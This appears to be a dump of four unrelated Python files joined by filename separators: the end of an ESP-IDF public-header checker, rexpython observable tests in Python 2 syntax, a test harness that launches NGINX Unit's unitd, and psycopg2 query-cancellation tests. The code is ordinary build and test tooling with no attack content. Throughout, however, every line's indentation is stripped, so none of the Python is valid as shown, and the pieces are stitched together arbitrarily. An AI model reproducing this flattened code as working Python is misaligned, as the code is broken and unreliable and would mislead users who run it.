# 3) Preprocess the temp.h the same way in (1)
# - Pass the test if the preprocessor outputs are the same and whitespaces only (#include only header)
# - Fail the test if the preprocessor outputs are the same (but with some code)
# - If outputs different, pass the test
# 4) If header passed the steps 1) and 3) test that it produced zero assembly code
def check_one_header(self, header, num):
res = self.preprocess_one_header(header, num)
if res == self.COMPILE_ERR_REF_CONFIG_HDR_FAILED:
raise HeaderFailedSdkconfig()
elif res == self.COMPILE_ERR_ERROR_MACRO_HDR_OK:
return self.compile_one_header(header)
elif res == self.COMPILE_ERR_HDR_FAILED:
raise HeaderFailedBuildError()
elif res == self.PREPROC_OUT_ZERO_HDR_OK:
return self.compile_one_header(header)
elif res == self.PREPROC_OUT_SAME_HRD_FAILED:
raise HeaderFailedCppGuardMissing()
else:
self.compile_one_header(header)
try:
_, _, _, temp_header = exec_cmd_to_temp_file(["sed", "/#include/d; /#error/d", header], suffix=".h")
res = self.preprocess_one_header(temp_header, num, ignore_sdkconfig_issue=True)
if res == self.PREPROC_OUT_SAME_HRD_FAILED:
raise HeaderFailedCppGuardMissing()
elif res == self.PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED:
raise HeaderFailedCppGuardMissing()
finally:
os.unlink(temp_header)
def compile_one_header(self, header):
rc, out, err = exec_cmd([self.gcc, "-S", "-o-", "-include", header, self.main_c] + self.include_dir_flags)
if rc == 0:
if not re.sub(self.assembly_nocode, '', out, flags=re.M).isspace():
raise HeaderFailedContainsCode()
return # Header OK: produced zero code
self.log("{}: FAILED: compilation issue".format(header), True)
self.log(err, True)
raise HeaderFailedBuildError()
def preprocess_one_header(self, header, num, ignore_sdkconfig_issue=False):
all_compilation_flags = ["-w", "-P", "-E", "-include", header, self.main_c] + self.include_dir_flags
if not ignore_sdkconfig_issue:
            # just strip comments to check for CONFIG_... macros
rc, out, err = exec_cmd([self.gcc, "-fpreprocessed", "-dD", "-P", "-E", header] + self.include_dir_flags)
if re.search(self.kconfig_macro, out):
# enable defined #error if sdkconfig.h not included
all_compilation_flags.append("-DIDF_CHECK_SDKCONFIG_INCLUDED")
try:
# compile with C++, check for errors, outputs for a temp file
rc, cpp_out, err, cpp_out_file = exec_cmd_to_temp_file([self.gpp, "--std=c++17"] + all_compilation_flags)
if rc != 0:
if re.search(self.error_macro, err):
if re.search(self.error_orphan_kconfig, err):
self.log("{}: CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED".format(header), True)
return self.COMPILE_ERR_REF_CONFIG_HDR_FAILED
self.log("{}: Error directive failure: OK".format(header))
return self.COMPILE_ERR_ERROR_MACRO_HDR_OK
self.log("{}: FAILED: compilation issue".format(header), True)
self.log(err)
return self.COMPILE_ERR_HDR_FAILED
# compile with C compiler, outputs to another temp file
rc, c99_out, err, c99_out_file = exec_cmd_to_temp_file([self.gcc, "--std=c99"] + all_compilation_flags)
if rc != 0:
self.log("{} FAILED should never happen".format(header))
return self.COMPILE_ERR_HDR_FAILED
# diff the two outputs
rc, diff, err = exec_cmd(["diff", c99_out_file, cpp_out_file])
if not diff or diff.isspace():
if not cpp_out or cpp_out.isspace():
self.log("{} The same, but empty out - OK".format(header))
return self.PREPROC_OUT_ZERO_HDR_OK
self.log("{} FAILED C and C++ preprocessor output is the same!".format(header), True)
return self.PREPROC_OUT_SAME_HRD_FAILED
if re.search(self.extern_c, diff):
self.log("{} extern C present - OK".format(header))
return self.PREPROC_OUT_DIFFERENT_WITH_EXT_C_HDR_OK
self.log("{} Different but no extern C - FAILED".format(header), True)
return self.PREPROC_OUT_DIFFERENT_NO_EXT_C_HDR_FAILED
finally:
os.unlink(cpp_out_file)
try:
os.unlink(c99_out_file)
except Exception:
pass
# Get compilation data from an example to list all public header files
def list_public_headers(self, ignore_dirs, ignore_files, only_dir=None):
idf_path = os.getenv('IDF_PATH')
project_dir = os.path.join(idf_path, "examples", "get-started", "blink")
subprocess.check_call(["idf.py", "reconfigure"], cwd=project_dir)
build_commands_json = os.path.join(project_dir, "build", "compile_commands.json")
with open(build_commands_json, "r") as f:
build_command = json.load(f)[0]["command"].split()
include_dir_flags = []
include_dirs = []
# process compilation flags (includes and defines)
for item in build_command:
if item.startswith("-I"):
include_dir_flags.append(item)
if "components" in item:
include_dirs.append(item[2:]) # Removing the leading "-I"
if item.startswith("-D"):
include_dir_flags.append(item.replace('\\','')) # removes escaped quotes, eg: -DMBEDTLS_CONFIG_FILE=\\\"mbedtls/esp_config.h\\\"
include_dir_flags.append("-I" + os.path.join(project_dir, "build", "config"))
sdkconfig_h = os.path.join(project_dir, "build", "config", "sdkconfig.h")
        # prepares a main_c file for easier sdkconfig checks and to avoid compiler warnings when compiling headers directly
with open(sdkconfig_h, "a") as f:
f.write("#define IDF_SDKCONFIG_INCLUDED")
main_c = os.path.join(project_dir, "build", "compile.c")
with open(main_c, "w") as f:
f.write("#if defined(IDF_CHECK_SDKCONFIG_INCLUDED) && ! defined(IDF_SDKCONFIG_INCLUDED)\n"
"#error CONFIG_VARS_USED_WHILE_SDKCONFIG_NOT_INCLUDED\n"
"#endif")
# processes public include dirs, removing ignored files
all_include_files = []
files_to_check = []
for d in include_dirs:
if only_dir is not None and not os.path.relpath(d, idf_path).startswith(only_dir):
self.log('{} - directory ignored (not in "{}")'.format(d, only_dir))
continue
if os.path.relpath(d, idf_path).startswith(tuple(ignore_dirs)):
self.log("{} - directory ignored".format(d))
continue
for root, dirnames, filenames in os.walk(d):
for filename in fnmatch.filter(filenames, '*.h'):
all_include_files.append(os.path.join(root, filename))
self.main_c = main_c
self.include_dir_flags = include_dir_flags
ignore_files = set(ignore_files)
# processes public include files, removing ignored files
for f in all_include_files:
rel_path_file = os.path.relpath(f, idf_path)
if any([os.path.commonprefix([d, rel_path_file]) == d for d in ignore_dirs]):
self.log("{} - file ignored (inside ignore dir)".format(f))
continue
if rel_path_file in ignore_files:
self.log("{} - file ignored".format(f))
continue
files_to_check.append(f)
# removes duplicates and places headers to a work queue
for f in set(files_to_check):
self.job_queue.put(f)
self.job_queue.put(None) # to indicate the last job
def check_all_headers():
parser = argparse.ArgumentParser("Public header checker file")
parser.add_argument("--verbose", "-v", help="enables verbose mode", action="store_true")
parser.add_argument("--jobs", "-j", help="number of jobs to run checker", default=1, type=int)
parser.add_argument("--prefix", "-p", help="compiler prefix", default="xtensa-esp32-elf-", type=str)
parser.add_argument("--exclude-file", "-e", help="exception file", default="check_public_headers_exceptions.txt", type=str)
parser.add_argument("--only-dir", "-d", help="reduce the analysis to this directory only", default=None, type=str)
args = parser.parse_args()
# process excluded files and dirs
exclude_file = os.path.join(os.path.dirname(__file__), args.exclude_file)
with open(exclude_file, "r") as f:
lines = [line.rstrip() for line in f]
ignore_files = []
ignore_dirs = []
for line in lines:
if not line or line.isspace() or line.startswith("#"):
continue
if os.path.isdir(line):
ignore_dirs.append(line)
else:
ignore_files.append(line)
# start header check
with PublicHeaderChecker(args.verbose, args.jobs, args.prefix) as header_check:
header_check.list_public_headers(ignore_dirs, ignore_files, only_dir=args.only_dir)
try:
header_check.join()
failures = header_check.get_failed()
if len(failures) > 0:
for failed in failures:
print(failed)
exit(1)
print("No errors found")
except KeyboardInterrupt:
print("Keyboard interrupt")
if __name__ == '__main__':
check_all_headers()
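# Example invocation (illustrative; assumes an ESP-IDF environment where IDF_PATH
# is set and idf.py is on PATH, since list_public_headers() reconfigures the
# blink example to obtain compile flags):
#   python check_public_headers.py --verbose --jobs 4 --prefix xtensa-esp32-elf-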
|
test_observable.py
|
import logging
import multiprocessing
import sys
import time
from unittest import TestCase
import rexpython as rx
logging.basicConfig(format="%(asctime)-15s %(name)-25s %(levelname)s %(process)d %(message)s")
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
class TestOnError(TestCase):
def test_onerror(self):
def o(em):
try:
raise ValueError("42")
except ValueError:
print "GAGA"
em.onError(sys.exc_info())
rx.Observable.create(o) \
.doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \
.subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"),
on_complete=lambda: self.fail("should fail")
))
def test_onerror_multiprocess(self):
main_pid = multiprocessing.current_process().pid
def o(em):
log.error(main_pid)
log.error(multiprocessing.current_process().pid)
assert main_pid != multiprocessing.current_process().pid
try:
raise ValueError("42")
except ValueError:
log.error("GAGA")
em.onError(sys.exc_info())
log.debug("hello")
d = rx.Observable.create(o) \
.doOnError(lambda e: log.debug("failed. good. %s" % str(e))) \
.subscribeOn(multiprocessing.Process) \
.subscribe(rx.LambdaObserver(on_error=lambda e: log.debug("cool. on_error fired"),
on_complete=lambda: self.fail("should fail")
))
print ("disp", d)
class TestObservable(TestCase):
def test_blockingSubscribe(self):
d = rx.Observable.from_(xrange(1, 4)).blockingSubscribe(
on_next=lambda i: sys.stdout.write("from=%s\n" % i),
on_complete=lambda: sys.stdout.write("!! complete\n")
)
print d
def test_play(self):
def ga(i):
while True:
log.debug("ga %s" % i)
time.sleep(1)
plist = []
for i in xrange(1, 5):
p = multiprocessing.Process(target=ga, args=(i,))
p.start()
plist.append(p)
for pp in plist:
print pp
pp.join()
print "PLAY"
def test_observeOn(self):
def emit(emitter):
"""
:type emitter: rx.ObservableEmitter
"""
emitter.setDisposable(rx.ActionDisposable(lambda: sys.stdout.write("disposed")))
for i in xrange(1, 30):
log.debug("emit %s" % i)
emitter.onNext(i)
time.sleep(1)
emitter.onComplete()
log.info("hello")
log.debug("main process is %s\n" % multiprocessing.current_process().pid)
o = rx.Observable.create(emit).observeOn(multiprocessing.Process)
d = o \
.doOnNext(lambda x: log.debug("doonnext=%s" % x)).map(lambda x: x * 10) \
.blockingSubscribe(on_next=lambda x: log.debug("subscribe x=%s" % x),
on_error=lambda e: log.error("onerror!!!!1111111"))
print "d=", d
# def test_subscribeOn(self):
# def emit(emitter):
# """
#
# :type emitter: rexpython.Emitter
# """
# for i in xrange(1, 40):
# log.debug("emit %s" % i)
# emitter.onNext(i)
# time.sleep(1)
#
# o = rx.Observable.create(emit).doOnNext(lambda x: log.debug("doonnext=%s" % x))
# d = o.subscribeOn(multiprocessing.Process).subscribe(
# rx.LambdaObserver(on_next=lambda x: log.debug("subscribe x=%s" % x)))
# print "d=", d
|
main.py
|
import argparse
import atexit
import fcntl
import os
import platform
import re
import shutil
import signal
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from multiprocessing import Process
class TestUnit(unittest.TestCase):
current_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir)
)
pardir = os.path.abspath(
os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)
)
is_su = os.geteuid() == 0
uid = os.geteuid()
gid = os.getegid()
architecture = platform.architecture()[0]
system = platform.system()
maxDiff = None
detailed = False
save_log = False
print_log = False
unsafe = False
def __init__(self, methodName='runTest'):
super().__init__(methodName)
if re.match(r'.*\/run\.py$', sys.argv[0]):
args, rest = TestUnit._parse_args()
TestUnit._set_args(args)
def run(self, result=None):
if not hasattr(self, 'application_type'):
return super().run(result)
# rerun test for each available module version
type = self.application_type
for module in self.prerequisites['modules']:
if module in self.available['modules']:
prereq_version = self.prerequisites['modules'][module]
available_versions = self.available['modules'][module]
if prereq_version == 'all':
for version in available_versions:
self.application_type = type + ' ' + version
super().run(result)
elif prereq_version == 'any':
self.application_type = type + ' ' + available_versions[0]
super().run(result)
else:
for version in available_versions:
if version.startswith(prereq_version):
self.application_type = type + ' ' + version
super().run(result)
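    # A hypothetical subclass declaration that the version loop above consumes;
    # the module name and the 'any' version constraint are illustrative only:
    #
    #   class TestPythonApplication(TestUnit):
    #       application_type = 'python'
    #       prerequisites = {'modules': {'python': 'any'}}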
@classmethod
def main(cls):
args, rest = TestUnit._parse_args()
for i, arg in enumerate(rest):
if arg[:5] == 'test_':
rest[i] = cls.__name__ + '.' + arg
sys.argv = sys.argv[:1] + rest
TestUnit._set_args(args)
unittest.main()
@classmethod
def setUpClass(cls, complete_check=True):
cls.available = {'modules': {}, 'features': {}}
unit = TestUnit()
unit._run()
# read unit.log
for i in range(50):
with open(unit.testdir + '/unit.log', 'r') as f:
log = f.read()
m = re.search('controller started', log)
if m is None:
time.sleep(0.1)
else:
break
if m is None:
unit._print_log()
exit("Unit is writing log too long")
# discover available modules from unit.log
for module in re.findall(r'module: ([a-zA-Z]+) (.*) ".*"$', log, re.M):
if module[0] not in cls.available['modules']:
cls.available['modules'][module[0]] = [module[1]]
else:
cls.available['modules'][module[0]].append(module[1])
def check(available, prerequisites):
missed = []
# check modules
if 'modules' in prerequisites:
available_modules = list(available['modules'].keys())
for module in prerequisites['modules']:
if module in available_modules:
continue
missed.append(module)
if missed:
print('Unit has no ' + ', '.join(missed) + ' module(s)')
raise unittest.SkipTest()
# check features
if 'features' in prerequisites:
available_features = list(available['features'].keys())
for feature in prerequisites['features']:
if feature in available_features:
continue
missed.append(feature)
if missed:
print(', '.join(missed) + ' feature(s) not supported')
raise unittest.SkipTest()
def destroy():
unit.stop()
unit._check_alerts(log)
shutil.rmtree(unit.testdir)
def complete():
destroy()
check(cls.available, cls.prerequisites)
if complete_check:
complete()
else:
unit.complete = complete
return unit
def setUp(self):
self._run()
def _run(self):
build_dir = self.pardir + '/build'
self.unitd = build_dir + '/unitd'
if not os.path.isfile(self.unitd):
exit("Could not find unit")
self.testdir = tempfile.mkdtemp(prefix='unit-test-')
self.public_dir(self.testdir)
if oct(stat.S_IMODE(os.stat(build_dir).st_mode)) != '0o777':
self.public_dir(build_dir)
os.mkdir(self.testdir + '/state')
with open(self.testdir + '/unit.log', 'w') as log:
self._p = subprocess.Popen(
[
self.unitd,
'--no-daemon',
'--modules', self.pardir + '/build',
'--state', self.testdir + '/state',
'--pid', self.testdir + '/unit.pid',
'--log', self.testdir + '/unit.log',
'--control', 'unix:' + self.testdir + '/control.unit.sock',
'--tmp', self.testdir,
],
stderr=log,
)
atexit.register(self.stop)
if not self.waitforfiles(self.testdir + '/control.unit.sock'):
self._print_log()
exit("Could not start unit")
self.skip_alerts = [
r'read signalfd\(4\) failed',
r'sendmsg.+failed',
r'recvmsg.+failed',
]
self.skip_sanitizer = False
def tearDown(self):
stop_errs = self.stop()
# detect errors and failures for current test
def list2reason(exc_list):
if exc_list and exc_list[-1][0] is self:
return exc_list[-1][1]
if hasattr(self, '_outcome'):
result = self.defaultTestResult()
self._feedErrorsToResult(result, self._outcome.errors)
else:
result = getattr(
self, '_outcomeForDoCleanups', self._resultForDoCleanups
)
success = not list2reason(result.errors) and not list2reason(
result.failures
)
# check unit.log for alerts
unit_log = self.testdir + '/unit.log'
with open(unit_log, 'r', encoding='utf-8', errors='ignore') as f:
self._check_alerts(f.read())
# remove unit.log
if not TestUnit.save_log and success:
shutil.rmtree(self.testdir)
else:
self._print_log()
self.assertListEqual(stop_errs, [None, None], 'stop errors')
def stop(self):
errors = []
errors.append(self._stop())
errors.append(self.stop_processes())
atexit.unregister(self.stop)
return errors
def _stop(self):
if self._p.poll() is not None:
return
with self._p as p:
p.send_signal(signal.SIGQUIT)
try:
retcode = p.wait(15)
if retcode:
return 'Child process terminated with code ' + str(retcode)
except:
p.kill()
return 'Could not terminate unit'
def run_process(self, target, *args):
if not hasattr(self, '_processes'):
self._processes = []
process = Process(target=target, args=args)
process.start()
self._processes.append(process)
def stop_processes(self):
if not hasattr(self, '_processes'):
return
fail = False
for process in self._processes:
if process.is_alive():
process.terminate()
process.join(timeout=15)
if process.is_alive():
fail = True
if fail:
            return 'Failed to stop process(es)'
def waitforfiles(self, *files):
for i in range(50):
wait = False
ret = False
for f in files:
if not os.path.exists(f):
wait = True
break
if wait:
time.sleep(0.1)
else:
ret = True
break
return ret
def public_dir(self, path):
os.chmod(path, 0o777)
for root, dirs, files in os.walk(path):
for d in dirs:
os.chmod(os.path.join(root, d), 0o777)
for f in files:
os.chmod(os.path.join(root, f), 0o777)
def _check_alerts(self, log):
found = False
        alerts = re.findall(r'.+\[alert\].+', log)
if alerts:
print('All alerts/sanitizer errors found in log:')
[print(alert) for alert in alerts]
found = True
if self.skip_alerts:
for skip in self.skip_alerts:
alerts = [al for al in alerts if re.search(skip, al) is None]
if alerts:
self._print_log(log)
self.assertFalse(alerts, 'alert(s)')
if not self.skip_sanitizer:
sanitizer_errors = re.findall('.+Sanitizer.+', log)
if sanitizer_errors:
self._print_log(log)
self.assertFalse(sanitizer_errors, 'sanitizer error(s)')
if found:
print('skipped.')
@staticmethod
def _parse_args():
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument(
'-d',
'--detailed',
dest='detailed',
action='store_true',
help='Detailed output for tests',
)
parser.add_argument(
'-l',
'--log',
dest='save_log',
action='store_true',
help='Save unit.log after the test execution',
)
parser.add_argument(
'-r',
'--reprint_log',
dest='print_log',
action='store_true',
help='Print unit.log to stdout in case of errors',
)
parser.add_argument(
'-u',
'--unsafe',
dest='unsafe',
action='store_true',
help='Run unsafe tests',
)
return parser.parse_known_args()
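    # Illustrative command line for the external run.py runner mentioned in
    # __init__ (the flags map to the options defined above):
    #   ./run.py --detailed --log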
@staticmethod
def _set_args(args):
TestUnit.detailed = args.detailed
TestUnit.save_log = args.save_log
TestUnit.print_log = args.print_log
TestUnit.unsafe = args.unsafe
        # make stdout blocking to avoid partial writes of detailed output
if TestUnit.detailed or TestUnit.print_log:
fcntl.fcntl(sys.stdout.fileno(), fcntl.F_SETFL, 0)
def _print_log(self, data=None):
path = self.testdir + '/unit.log'
print('Path to unit.log:\n' + path + '\n')
if TestUnit.print_log:
if data is None:
with open(path, 'r', encoding='utf-8', errors='ignore') as f:
data = f.read()
print(data)
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2011 Jan Urbański <[email protected]>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from testconfig import dsn
from testutils import unittest, ConnectingTestCase, skip_before_postgres
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(psycopg2.extensions.QueryCanceledError,
cur.execute, "select pg_sleep(60)")
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1, )])
except Exception, e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception, e:
errors.append(e)
raise
thread1 = threading.Thread(target=neverending, args=(self.conn, ))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn, ))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10000)")
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(psycopg2.extensions.QueryCanceledError,
extras.wait_select, async_conn)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1, )])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|